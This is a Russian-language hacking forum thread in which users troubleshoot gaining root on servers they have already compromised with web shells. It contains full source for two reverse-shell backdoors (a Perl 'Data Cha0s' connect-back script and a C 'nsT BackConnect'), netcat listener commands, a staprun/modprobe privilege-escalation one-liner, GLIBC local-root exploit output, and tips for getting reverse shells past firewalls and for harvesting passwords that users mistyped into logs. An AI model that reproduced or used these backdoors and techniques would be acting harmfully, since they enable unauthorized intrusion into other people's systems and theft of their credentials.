wso vidaet pri backconect'e nobody 10061 0.0 0.0 2240 992 ? R 07:23 0:00 sh -c ps aux | grep bc.pl i v netcat tozhe samoe not found
zalil skompilil/zapustil on vidal:GLIBC local privilege escalation exploit Bugs found by Tavis Ormandy made by: devilzc0de.org eto ctho znachit??
rode vse vishlo. teper vopros po exsploiatm staprun vidaet: sh: staprun: comand not found ja vot eto v netcate zapuskal: printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u whatever
i vot rezultat ispolzovanija pod glibc sh-3.00$ ./spl sh: dpkg: command not found suid.c:1:108: warning: no newline at e /usr/bin/ld: cannot open output file / collect2: ld returned 1 exit status mkdir: cannot create directory '/tmp/e ln: '/tmp/exploit/target': File exists sh: /proc/self/fd/3: No such file or d sh: line 0: exec: /proc/self/fd/3: can GLIBC local privilege escalation explo Bugs found by Tavis Ormandy made by: devilzc0de.org sh-3.00$ mkdir: cannot create director sh: /proc/self/fd/3: No such file or d sh: line 0: exec: /proc/self/fd/3: can ln: '/tmp/exploit/target': File exists /usr/bin/ld: cannot open output file / collect2: ld returned 1 exit status
Проблема с рутингом Привет всем! У меня такая проблема: 2.6.18-194.3.1.el5.028stab069.6 #1 SMP Wed May 26 18:31:05 MSD 2010 i686 Подобрал такую вещь: http://1337day.com/download/15065 Запустил, PHP: gcc go.c (файл был назван go.c) вышли ошибки (syntax error), потом попробовал убрать комментарии из верха файла и добавил пустую строку внизу, скомпайлил, сработало, не показывает ошибок, но : PHP: sh-3.2$ id uid=48(apache) gid=48(apache) groups=48(apache),2523(psaserv) sh-3.2$ Не подскажете, что нужно сделать, чтобы стать рут здесь? Я в СИ не слишком силён) Заранее спасибо за помощь!
Кидай в папку system32 содержимое архива: http://joncraton.org/files/nc111nt.zip Потом Win+R, а дальше по инструкции...
Тут есть ещё кто живой? Короче такая штука. поднимаю у себя на серве листенер 31336 порта. netcat -l -p 31336 В шелле соответственно выполняю print system('perl dc.pl мойип 31336'); пишет но на серваке 0 реакции. код dc.pl PHP: #!/usr/bin/perl use Socket; print "Data Cha0s Connect Back Backdoor\n\n"; if (!$ARGV[0]) { printf "Usage: $0 [Host] <Port>\n"; exit(1); } print "[*] Dumping Arguments\n"; $host = $ARGV[0]; $port = 80; if ($ARGV[1]) { $port = $ARGV[1]; } print "[*] Connecting...\n"; $proto = getprotobyname('tcp') || die("Unknown Protocol\n"); socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n"); my $target = inet_aton($host); if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) { die("Unable to Connect\n"); } print "[*] Spawning Shell\n"; if (!fork( )) { open(STDIN,">&SERVER"); open(STDOUT,">&SERVER"); open(STDERR,">&SERVER"); exec {'/bin/sh'} '-bash' . "\0" x 4; exit(0); } print "[*] Datached\n\n"; Что может быть не так?
Для того чтобы сделать бекконект нужно чтобы у тебя был прямой ип адрес, исходя из твоего описания ситуации можно предположить, что у тебя не прямой ип, или фарейвол блокирует коннект. Решение данной проблемы: 1) Купить дедик с прямым ип адресом и на него делать бекконетк. 2) Биндити порт на серваке и коннектитись через неткат к нему (опять может возникнуть проблема с фаерволом но уже на стороне сервера\шелла) п.с:ты не порутаеш данный серв
в FreeBSD пароли храняться в /etc/master.password в зашифрованом виде в 98% случая доступен только рут юзеру здесь стоит скорее вопрос зачем тебе интерактивный доступ, если ты не порутаеш серв, остальные действия можно выполнять и через веб-шелл
если прямой ип и у тебя роутер возможно не настроен форвардинг портов и демилитаризированая зона на роутере. и отключи фаер у себя, да. попробуй еще другой бэк: Code: /* ********************************* **** Network security team ****** ********* nst.void.ru *********** ********************************* * Title: nsT BackConnect Backdoor v1.0 * Date: 09.04.2006 * Usage: * client: nc -lp 9999 * server: ./backconnect <ip_client> 9999 ********************************* */ #include <stdlib.h> #include <stdio.h> #include <error.h> #include <string.h> #include <fcntl.h> #include <sys/socket.h> #include <sys/types.h> #include <resolv.h> int main (int argc, char **argv) { struct sockaddr_in sock; int sd; char command[256]; if (argc < 3) { printf("%s <host> <port>\n", argv[0]); return 1; } close(1); if ((sd = socket(PF_INET, SOCK_STREAM, 0)) < 0) { perror(argv[0]); return 1; } bzero(&sock, sizeof(sock)); sock.sin_family = AF_INET; sock.sin_port = htons(atoi(argv[2])); inet_aton(argv[1], &sock.sin_addr); if (connect(sd, (struct sockaddr *)&sock, sizeof(sock))) { perror(argv[0]); return 1; } close(2); dup(sd); bzero(command, 256); while (recv(sd, command, 255, 0) && strncmp(command, "quit", 4)) { system(command); bzero(command, 256); } close(sd); return 0; }
если есть права читай логи, все что не лень. очень часто юзеры феилят и вбивают пасс вместо логина следовательно он записывается и другие случаи. пробуй пасс от разных сервисов, если есть возможность.
блин, чёто ссылочки из первого поста поздыхали, нс залил шелл скачать нужный сплоит, а дальше чем и как пользоватся?
